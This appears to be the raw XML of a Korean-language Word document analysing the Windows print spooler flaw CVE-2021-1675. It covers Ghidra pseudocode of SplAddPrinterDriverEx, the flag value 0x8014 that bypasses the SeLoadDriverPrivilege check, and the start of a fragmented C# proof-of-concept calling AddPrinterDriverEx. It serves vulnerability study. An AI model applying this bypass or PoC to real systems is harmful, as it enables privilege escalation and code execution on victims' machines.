    <w:p w14:paraId="04560017" w14:textId="529F2214" w:rsidR="00F53627" w:rsidRDefault="00F53627" w:rsidP="00E3020F">
      <w:r>
        <w:t>localspl.dll</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">은 </w:t>
      </w:r>
      <w:r>
        <w:t>System32</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>폴더 내에 존재하는 라이브러리입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해당 폴더에서 분석을 진행하기에는 문제가 생기므로 분석시에만 다른 폴더에 복사하여 진행하도록 합니다.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>분석 진행은 무료 분석도구인 기드라(G</w:t>
      </w:r>
      <w:r>
        <w:t>ydra)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>를 사용했습니다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="375645E3" w14:textId="77777777" w:rsidR="00F53627" w:rsidRDefault="00F53627">
      <w:pPr>
        <w:widowControl/>
        <w:wordWrap/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D1B8512" w14:textId="3366630F" w:rsidR="00835F76" w:rsidRDefault="00835F76" w:rsidP="00835F76">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Local</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:t>pl.dll</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">에서 사용되는 함수 목록을 보면, </w:t>
      </w:r>
      <w:r>
        <w:t>SplAddPrinterDriver</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Ex(</w:t>
      </w:r>
      <w:r>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>함수가 존재합니다.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">아래는 기드라에서 확인한 </w:t>
      </w:r>
      <w:r>
        <w:t>SplAddPrinterDriver</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Ex</w:t>
      </w:r>
      <w:r>
        <w:t>()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>의 기능입니다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6458C6B8" w14:textId="45F68365" w:rsidR="00F53627" w:rsidRDefault="00F53627" w:rsidP="00F53627">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r w:rsidRPr="00F53627">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="097BCA12" wp14:editId="13B13B22">
            <wp:extent cx="5731510" cy="4827905"/>
            <wp:effectExtent l="19050" t="19050" r="21590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1D40E" w14:textId="79F2F888" w:rsidR="00F53627" w:rsidRDefault="00F53627" w:rsidP="00F53627">
      <w:pPr>
        <w:pStyle w:val="a6"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">사진 5 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>l</w:t>
      </w:r>
      <w:r>
        <w:t>ocalspl.dll</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">의 함수 </w:t>
      </w:r>
      <w:r>
        <w:t>SplAddPrinterDriverEx</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>의 기드라 의사코드.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C27ECB6" w14:textId="4606BB3C" w:rsidR="00835F76" w:rsidRDefault="00835F76" w:rsidP="00835F76">
      <w:r>
        <w:t xml:space="preserve">여기서 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>S</w:t>
      </w:r>
      <w:r>
        <w:t>plAddPrinterDriverEx</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>는 p</w:t>
      </w:r>
      <w:r>
        <w:t>aram_1~7</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>의 매개변수를 인자로 받습니다.</w:t>
      </w:r>
      <w:r w:rsidR="0073324F">
        <w:t xml:space="preserve"> AddPrinterDriverEx</w:t>
      </w:r>
      <w:r w:rsidR="0073324F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">함수의 매개변수 중 </w:t>
      </w:r>
      <w:r w:rsidR="0073324F">
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidR="0073324F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">번째 매개변수가 </w:t>
      </w:r>
      <w:r w:rsidR="0073324F">
        <w:t>dwFileCopyFlags</w:t>
      </w:r>
      <w:r w:rsidR="0073324F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>였으므로 p</w:t>
      </w:r>
      <w:r w:rsidR="0073324F">
        <w:t>aram_4</w:t>
      </w:r>
      <w:r w:rsidR="0073324F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>로 추정할 수 있습니다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B49BA0D" w14:textId="2818034D" w:rsidR="005A73A8" w:rsidRDefault="005A73A8" w:rsidP="00835F76">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>여기서 공격자는 p</w:t>
      </w:r>
      <w:r>
        <w:t>aram_4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>변수를 입력을 통해 제어가 가능합니다.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>또한 해당 변수가 i</w:t>
      </w:r>
      <w:r>
        <w:t>f</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>문의 조건으로 사용되면서 문제가 발생합니다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C436F46" w14:textId="5BAAA4EA" w:rsidR="005A73A8" w:rsidRDefault="005A73A8">
      <w:pPr>
        <w:widowControl/>
        <w:wordWrap/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2E5AEAFC" w14:textId="77777777" w:rsidR="00E33C0C" w:rsidRDefault="005A73A8" w:rsidP="00E33C0C">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r w:rsidRPr="005A73A8">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="47BD3549" wp14:editId="44FCF0DE">
            <wp:extent cx="5731510" cy="2536190"/>
            <wp:effectExtent l="19050" t="19050" r="21590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14885" w14:textId="07D3E0E1" w:rsidR="005A73A8" w:rsidRDefault="00E33C0C" w:rsidP="00E33C0C">
      <w:pPr>
        <w:pStyle w:val="a6"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">사진 6 param_4 if </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>권한 검사</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="196D7404" w14:textId="18B943F9" w:rsidR="00EB4EE6" w:rsidRDefault="00EB4EE6" w:rsidP="00835F76">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>그럼 이제 왜 p</w:t>
      </w:r>
      <w:r>
        <w:t>aram_4(dwFileCopyFlags)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>가 중요한지 알아야 합니다.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">의사코드의 </w:t>
      </w:r>
      <w:r>
        <w:t>if</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">문에 따르면 </w:t>
      </w:r>
      <w:r>
        <w:t>(param_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>4 &gt;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve">&gt; 0xf &amp; 1) == 0 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">인 경우 </w:t>
      </w:r>
      <w:r>
        <w:t>uVar5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">가 </w:t>
      </w:r>
      <w:r>
        <w:t>param_7</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>을 통해 임의의 값을 가지게 되고,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">이때 </w:t>
      </w:r>
      <w:r>
        <w:t>FUN_18001f4d8</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>이 기능하게 됩니다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="167166A0" w14:textId="3631F170" w:rsidR="00021085" w:rsidRDefault="00021085" w:rsidP="000F0695">
      <w:r>
        <w:t>FUN_18001f4d8</w:t>
      </w:r>
      <w:r w:rsidR="001B6230">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">는 사용자가 </w:t>
      </w:r>
      <w:r w:rsidR="001B6230">
        <w:t>SeLoadDriverPrivilege</w:t>
      </w:r>
      <w:r w:rsidR="001B6230">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>권한이 있는지 확인하는 기능입니다.</w:t>
      </w:r>
      <w:r w:rsidR="000F0695">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="000F0695">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>때문에 공격자가 p</w:t>
      </w:r>
      <w:r w:rsidR="000F0695">
        <w:t>aram_4</w:t>
      </w:r>
      <w:r w:rsidR="000F0695">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">를 통해 제어한 </w:t>
      </w:r>
      <w:r w:rsidR="000F0695">
        <w:t>if</w:t>
      </w:r>
      <w:r w:rsidR="000F0695">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>문을 실행시키지 않는 것으로 해당 권한에 대한 검사를 우회하는 것 가능해집니다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3508244A" w14:textId="77777777" w:rsidR="00CC7959" w:rsidRDefault="00CC7959" w:rsidP="000F0695"/>
    <w:p w14:paraId="412C1C48" w14:textId="77777777" w:rsidR="00E33C0C" w:rsidRDefault="00CC7959" w:rsidP="00E33C0C">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r w:rsidRPr="00CC7959">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4B296544" wp14:editId="4AA7881E">
            <wp:extent cx="5731510" cy="1116965"/>
            <wp:effectExtent l="19050" t="19050" r="21590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848414" w14:textId="49D8574B" w:rsidR="00CC7959" w:rsidRDefault="00E33C0C" w:rsidP="00E33C0C">
      <w:pPr>
        <w:pStyle w:val="a6"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">사진 7 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>p</w:t>
      </w:r>
      <w:r>
        <w:t>aram_4 if binary code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AB2AD3A" w14:textId="7934326F" w:rsidR="00CC7959" w:rsidRDefault="00CC7959" w:rsidP="000F0695">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">그럼 </w:t>
      </w:r>
      <w:r>
        <w:t>if</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">문의 </w:t>
      </w:r>
      <w:r w:rsidR="00E33C0C">
        <w:t>p</w:t>
      </w:r>
      <w:r>
        <w:t>aram_4(dwFileCopyFlags)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>가 어떤 동작에 활용되는지 어셈블리 코드로 봐야합니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BT </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>명령어는 B</w:t>
      </w:r>
      <w:r>
        <w:t>eat Test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비트 오프셋에 의해 지정된 비트 위치에서 비트</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">문자열에서 비트를 선택하고 </w:t>
      </w:r>
      <w:r>
        <w:t>CF</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>에 비트값을 저장합니다.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>여기서 비트</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>문자열과 비트 위치는 각각 아래와 같습니다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7899F7A1" w14:textId="13C2D66E" w:rsidR="00CC7959" w:rsidRPr="00CC7959" w:rsidRDefault="00CC7959" w:rsidP="00CC7959">
      <w:pPr>
        <w:pStyle w:val="a5"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:ind w:leftChars="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CC7959">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">비트 문자열 </w:t>
      </w:r>
      <w:r w:rsidRPr="00CC7959">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>= dwFileCopyFlags</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="166C447B" w14:textId="11ADA6D0" w:rsidR="00CC7959" w:rsidRPr="00CC7959" w:rsidRDefault="00CC7959" w:rsidP="00CC7959">
      <w:pPr>
        <w:pStyle w:val="a5"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:ind w:leftChars="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CC7959">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">비트 위치 </w:t>
      </w:r>
      <w:r w:rsidRPr="00CC7959">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">= 0xf = </w:t>
      </w:r>
      <w:r w:rsidRPr="00CC7959">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>동작하지 않으면 이동(C</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC7959">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>F=0)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D38B5C5" w14:textId="70C0FD1C" w:rsidR="00CC7959" w:rsidRDefault="00CC7959" w:rsidP="00CC7959"/>
    <w:p w14:paraId="36BB0BCA" w14:textId="6A576448" w:rsidR="00DF313A" w:rsidRDefault="00DF313A" w:rsidP="00DF313A">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>따라서 비트값(</w:t>
      </w:r>
      <w:r>
        <w:t>dwFileCopyFlags)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">이 비트 테스트로 </w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>x</w:t>
      </w:r>
      <w:r>
        <w:t>f(15</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>비트</w:t>
      </w:r>
      <w:r>
        <w:t>)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나오도록 해야 </w:t>
      </w:r>
      <w:r>
        <w:t>SeLoadDriverPrivilege</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>검사를 건너뛸 수 있습니다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="303B346F" w14:textId="0B99B263" w:rsidR="00DF313A" w:rsidRDefault="0067308E" w:rsidP="00DF313A">
      <w:pPr>
        <w:widowControl/>
        <w:wordWrap/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">그렇다면 이제 </w:t>
      </w:r>
      <w:r>
        <w:t>dwFileCopyFlags</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">의 </w:t>
      </w:r>
      <w:r>
        <w:t>flags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x</w:t>
      </w:r>
      <w:r>
        <w:t>f</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">를 통해 </w:t>
      </w:r>
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>이 나와야 합니다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A17DB08" w14:textId="35FCC807" w:rsidR="0067308E" w:rsidRDefault="0067308E" w:rsidP="00DF313A">
      <w:pPr>
        <w:widowControl/>
        <w:wordWrap/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">해당 비트 플래그는 </w:t>
      </w:r>
      <w:r>
        <w:t>15</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">비트로 바이너리에서 </w:t>
      </w:r>
      <w:r>
        <w:t>‘1000 000 001 0100’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이를 h</w:t>
      </w:r>
      <w:r>
        <w:t>ex</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">로 계산하면 </w:t>
      </w:r>
      <w:r>
        <w:t>0x8014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공격자가 </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">flags </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">값으로 </w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>x</w:t>
      </w:r>
      <w:r>
        <w:t>8014</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>를 넣으면 성공적으로 권한 검사를 우회할 수 있습니다.</w:t>
      </w:r>
      <w:r w:rsidR="00B94E7C">
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r w:rsidR="00B94E7C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>물론</w:t>
      </w:r>
      <w:r w:rsidR="00B94E7C">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00B94E7C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">다른 비트 플래그로 </w:t>
      </w:r>
      <w:r w:rsidR="00B94E7C">
        <w:t>‘1’</w:t>
      </w:r>
      <w:r w:rsidR="00B94E7C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>을 도출할 수 있다면 그 또한 가능할 것입니다.</w:t>
      </w:r>
      <w:r w:rsidR="00B94E7C">
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67B8EA22" w14:textId="77777777" w:rsidR="00E33C0C" w:rsidRDefault="0067308E" w:rsidP="00E33C0C">
      <w:pPr>
        <w:keepNext/>
        <w:widowControl/>
        <w:wordWrap/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="0067308E">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2D7C2945" wp14:editId="244D3E22">
            <wp:extent cx="1588866" cy="29260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303" cy="2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ADAA" w14:textId="7B26F688" w:rsidR="0067308E" w:rsidRDefault="00E33C0C" w:rsidP="00E33C0C">
      <w:pPr>
        <w:pStyle w:val="a6"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">사진 8 BT </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>계산</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36960381" w14:textId="54872656" w:rsidR="00B94E7C" w:rsidRDefault="00B94E7C" w:rsidP="0067308E">
      <w:pPr>
        <w:widowControl/>
        <w:wordWrap/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5FD681CA" w14:textId="7AFDE4D4" w:rsidR="00B94E7C" w:rsidRDefault="00B94E7C" w:rsidP="00B94E7C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C]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FD7F28E" w14:textId="7A9C3163" w:rsidR="00B94E7C" w:rsidRDefault="00B94E7C" w:rsidP="00B94E7C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검사 우회가 진행되는지 확인하기 위해 임의의 p</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>oc</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>코드를 불러와 테스트해 보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 코드는 t</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>halpiu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git source code</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>를 가져왔습니다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="551F9A2D" w14:textId="05982CE9" w:rsidR="00B94E7C" w:rsidRDefault="00B94E7C" w:rsidP="00B94E7C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해당 코드로 </w:t>
      </w:r>
      <w:r w:rsidR="00191BCC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>검사를 진행할 수 있습니다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CEB70A4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;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="7F4D1EB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Collections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neric;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="4C9F4158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IO;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="149AAD1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nq;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="0CEF9A0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Runtime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teropServices;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="5EF41737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xt;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="552B86A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Threading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asks;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="01DA71B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485AC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VE_2021_1675</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56CF8F7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3BE91E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gram</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70F133E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061C444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PD_COPY_ALL_FILES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x00000004;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="71B35551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DD04EE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[DllImpo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spool.drv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harSet = CharSet.Auto, SetLastErro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]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4512E5B8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te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PrinterDriverE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Nam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vel, [In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IntPtr pDriverInfo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s);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="010393B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46C57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RIVER_INFO_2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13118AD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307688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Version;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="6E42B4A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[MarshalAs(UnmanagedType.LPTStr)]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1018B76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Name;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="1F3FE48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[MarshalAs(UnmanagedType.LPTStr)]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="712EABD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nvironment;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="2682412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[MarshalAs(UnmanagedType.LPTStr)]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E0B238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DriverPath;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="3C5DE2A1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[MarshalAs(UnmanagedType.LPTStr)]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78CC218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DataFile;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="4A2E956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[MarshalAs(UnmanagedType.LPTStr)]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="782753B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ConfigFile;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="17C424A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ABF982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()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="033CD674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FFBE227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lease enter a path to a loaded driver and a DLL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D1FCCF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07AFB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xample: CVE-2021-1675.exe /driverpath:c:\\absolute\\path /dll:c:\\absolute\\path&gt;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9ED0D51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ystem.Environment.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624D6B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E4DC861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0CF6E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PrinterDriv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verpat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file)</w:t>
      </w:r>
    </w:p>
